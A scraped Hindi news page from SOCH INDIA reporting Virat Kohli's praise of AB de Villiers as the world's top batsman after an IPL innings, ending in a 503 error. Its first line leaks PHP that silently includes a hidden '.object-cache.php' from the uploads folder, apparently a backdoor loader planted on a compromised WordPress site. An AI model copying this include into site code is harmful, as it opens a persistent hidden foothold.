add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कोहली ने किया खुलासा, ये खिलाड़ी है इस समय दुनिया का नंबर 1 बल्लेबाज! – SOCH INDIA
Menu

खेल
कोहली ने किया खुलासा, ये खिलाड़ी है इस समय दुनिया का नंबर 1 बल्लेबाज!

nobanner

खेलों की दुनिया में हमेशा से दो खिलाड़ियों के बीच तुलना की गई। चाहे फुटबॉल में मेसी और रोनाल्डो हों या फिर टेनिस में फेडरर औऱ नडाल। अब मौजूदा क्रिकेट में भी विराट कोहली और एबी डिविलियर्स के बीच में तुलना हो रही है। लेकिन इस बहस को इन दोनों ने आपस में ही खत्म कर लिया।

दोनों की दोस्ती अटूट है, इसमें कोई शक नहीं। लेकिन आप दोनों में बेहतर कौन है ये जानने के लिए दुनिया बेकरार है। इस जैंट्लमैंस गेम का सुपरमैन किसे माना जाए, ये सभी जानना चाहते हैं। मैच दर मैच, प्रदर्शन दर प्रदर्शन ये सवाल और भी ज्यादा मुश्किल होता चला जा रहा है। लेकिन आईपीएल में एबी डिविलियर्स के कप्तान और सबसे ज्यादा रन बनाने बनाने वाले विराट कोहली ने इस बहस को खुद ही खत्म कर दिया।

कोहली ने किया खुलासा, ये खिलाड़ी है इस समय दुनिया का नंबर 1 बल्लेबाज!
शानदार फॉर्म में चल रहे भारत के बल्लेबाज विराट कोहली को इस समय बेहतरीन बल्लेबाज माना जा रहा, लेकिन विराट ने कहा है कि वो नहीं बल्कि ये खिलाड़ी है इस समय दुनिया का नंबर 1 बल्लेबाज।

जी हां, विराट के मुताबिक हालिया समय में डिविलियर्स सबसे शानदार बल्लेबाज हैं। प्लेऑफ में गुजरात के खिलाफ खेली गई डिविलियर्स की पारी के बाद कोहली पूरी तरह नतमस्तक हो गए है। बेहद दबाव वाले पलों में डिविलियर्स के इस करिश्मे ने उनके सबसे बड़े प्रतिद्वंदी विराट कोहली को भी उनका दीवाना बना दिया है।

नंबर-1 गुजरात लांयस के खिलाफ डिविलियर्स इस आईपीएल में बिना आउट हुए 228 रन बना चुके हैं। इसमें एक शतक भी शामिल है। जिस तरह से डिविलियर्स ने अपनी टीम और अपने कप्तान के लिए गुजरात के शेरों के मुंह से जीत निकाली, उससे टीम इंडिया का शेर भी दक्षिण अफ्रीकी शेर का दीवाना बन गया।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.